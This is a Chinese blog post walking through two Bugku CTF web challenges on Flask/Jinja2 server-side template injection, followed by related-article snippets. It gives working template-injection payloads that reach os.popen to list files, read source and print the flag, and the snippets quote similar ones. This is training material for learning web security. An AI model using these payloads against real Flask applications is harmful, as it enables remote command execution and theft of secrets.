bugku ctf Web SSTI两道练习题

最新推荐文章于 2024-03-13 21:47:16 发布
最新推荐文章于 2024-03-13 21:47:16 发布
阅读量478 收藏
点赞数
分类专栏: bugku练习 文章标签: flask python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yonren54159/article/details/120048393
版权

第一题
在这里插入图片描述
服务端模块注入
打开环境,看到提示文字需要传flag的值,尝试用get方法
?flag=1 得到1,
?flag={{7*7}}得到执行结果49,判断存在服务端模块注入漏洞

payload

{{'a'.__class__.__base__.__subclasses__()[177].__init__.__globals__['sys'].modules['os'].popen("ls").read()}}

针对flask,简单的payload,url_for函数中直接导入了os,直接利用
{{url_for.globals.os.popen(“ls”).read()}}

查看后发现有个app.py,使用cat命令查看源码,整理发现只需要执行echo $FLAG 就能得到flag 执行该命令得到flag

题2
同样是服务端模块注入
在这里插入图片描述

用题一的payload同样可以得到目录下有个flag
直接cat得到flag内容

payload的原理可以参考这两篇文章https://www.jianshu.com/p/56614e46093e

或者看这个视频
https://www.bilibili.com/video/BV17V411i7hA?from=search&seid=18376090121763545638

yonren54159
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugkuctf解题-WEB
05-04
bugku writeup,web解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
CTF题型 SSTI(1) Flask-SSTI-labs 通关 题记
最新发布
qq_39947980的博客
03-13 1876
CTF题型 SSTI(1)基础必过 学会自己手动构造payload
Bguku CTF 每日一题 Simple_SSTI_1
彼岸花苏陌的博客
01-13 620
Simple_SSTI_1 进入场景 发现出现了提示 要我们输入flag为参数 输入后发现显示了 因为题目提示是SSTI,于是输入{{2*4}} 发现得到了8 确定存在SSTI 但是仅仅如此 按下f12 发现注释里有提示 You know, in the flask, We often set a secret_key variable. 所以说是flask模板注入 注释提示我们去找变量 于是就传flag={{config}} 从返回中找到答案 ...
ctf show-web入门 SSTI篇部分题解
volcano的博客
02-04 3910
ctfshowSSTIweb361web362web363request.args传参绕过web364chr()绕过web365中括号绕过web366attr获取变量request.cookies传参web367web368 SSTI ssti模板注入基本原理推荐看这篇文章,这个师傅写的很详细,小白也很容易看懂。 web361 这个hackbar挺好用的,有现成模板,当前目录只有一个app.py,我们看一下上级目录 ?name={{ config.__class__.__init__.__globals_
ctf-show-SSTI模块练习
m0_74097148的博客
03-04 223
【代码】ctf-show-SSTI模块练习。
CTF题目记录8SSTI
kkzzjx
06-04 1425
# Web_python_template_injection flask模版注入不会啊,只能面向搜索引擎,已经入土了 首先是推荐两篇好文: [1.从零学习flask模板注入
bugku ctf misc wp.pdf
07-05
bugku ctf misc wp.pdf
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
apachecn#apachecn-ctf-wiki#BugkuCTF-WEB解题记录-11-15_weixin_3069946
07-25
BugkuCTF WEB解题记录 11-15_weixin_30699463的博客-CSDN博客来源:
BugkuCTF-WEB部分题解(一)
flying_bird2019的博客
03-04 2254
域名解析 访问 flag.baidu.com 提示:找不到网站 无法进行DNS解析 直接访问123.206.87.240 返回400 Bad Request 查询400错误 详情 两种方法解析域名 1.修改hosts文件: 直接在hosts文件中添加flag.bugku.com 120.24.86.145 2.修改头信息: 用burpsuit抓包修改host头信息为flag.bugku...
BugKu-web篇-Simple_SSTI_1
jiuyongpinyin的博客
05-28 3015
BugKu-web篇-Simple_SSTI_1 网上很很多的writeup,发现描述的都不是很全面,本人也是菜鸡,写一下对于这道题的理解,首先web应先看题目,再看源码,源码里没提示再看其他东西。 回到这道题,先看题目 题目告诉我们要传入一个flag参数,我尝试了POST直接就报错了,所以选择个get的传入方式,然后看源码 提示我们在flask里,经常设置一个secret_key变量,这里就得讲一下了,首先是Jinjan2 基础语法 分为三种: {% … %} {{ … }} {# … #} ​
web入门--ssti
whisper921的博客
04-16 2728
web361 注入点是?name。 ?name={{''.__class__.__mro__[1].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}} 利用的是os._wrap_close类 得到flag ctfshow{77ca18dd-38c5-4a9c-a735-522a8af345c9} web362 可以用以下已有的函数,去得到__builtins__,然后用eval就可以了:
ctfshow——web入门——SSTI
m0_74013288的博客
11-12 303
GET输入?说明注入点是?name。
Bugku-CTF SSTI ——新手ctf记录
xy7850的博客
09-21 900
目录 Simp_SSTI_1 解题过程 ​ Flask默认配置文件: flask查看配置文件的全局变量的playload: 设置secret_key: Simp_SSTI_2 解题过程: ​参考 Simp_SSTI_1 解题过程 进入场景,看到提示,得到第一条信息:参数名为 flag。 习惯性按F12,查看源码 看到新提示,得到第二条信息:需要flask设置secret_key变量 得到flag。 Flask默认配置文件: { 'D...
CTFSHOW】web入门 SSTI(更新中)
7ruth0hn的博客
08-17 348
文章目录引言web361web362web363参考资料 引言 刷完SSRF、XSS,来学学SSTI web361 首先测试出get的参数名为:name。 记得之前刷题时保存过一张大佬总结的测试流程图: 根据图片规则进行测试: ?name={{ 1*'4' }} 返回结果:4 则题目考察的很有可能是基于Jinja2的flask框架。 payload: 对于python3:(题目使用的是python3) 使用popen函数: ?name={% for c in [].__class__.__base_
bugku-web-Simple_SSTI_1
qq_51775369的博客
10-30 2980
.打开题目链接, 出现以下页面 提示需要传入一个名为flag的参数,题目又叫SSTI,从而得到了可以使用模板注入的基本条件 SSTI模板注入知识点:https://www.cnblogs.com/bmjoker/p/13508538.html 了解Jinjan2 基础语法 Jinja2模版语言,是不区分缩进的,和纯python不同。实际上所有模版语言都不区分缩紧。 常用标记: 注释:`{# 这是注释 #}` 变量:`{{ post.title }}`,或字典元素`{{your_d...
Bugku CTF——WEBSSTI学习笔记
qq_51096893的博客
12-19 4295
目录 知识前提 一.题目 二 .理解和学习 三.总结 我们在作为新手去开始进行这些题目的联系的时候只知道一些操作,而不知道原理,这里为新手简单介绍一些SSTI的概念和操作。 知识前提 我们通过实例去一起学习。学习这个之前,我们要知道以下几点: (1)什么是CTF(Capture The Flag) (2)CTF题目类型(我们今天讲解的是WEB类型中注入问题): 1.MISC(Miscellaneous)类型,即安全杂项,题目或涉及流量分析、电子取证、人肉搜索、数据分析等等。 2.P.
BugkuCTF-WEB部分题解(二)
flying_bird2019的博客
03-13 492
输入密码得到flag 这道题直接暴力破解 在使用Burp Suite时候设置完Number range 开始爆破出现错误Invalid number settings 百度得以下解决方法 解决问题后爆破得flag 备份是个好习惯 御剑扫描网站发现index.php.bak(后缀为.bak为备份文件) 访问** /index.php.bak **下载文件打开 审计代码 1.$_SERVER[‘R...
9-杂项题目练习(六)
10-05
2. **Web漏洞**:这一题考察的是Web安全防护的漏洞检测。通过Python脚本分析服务器的日志文件(access.log),查找特定模式(如"flag"关键字后面紧跟一个非法字符序列),然后解码获取机密信息。这涉及到HTTP协议...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值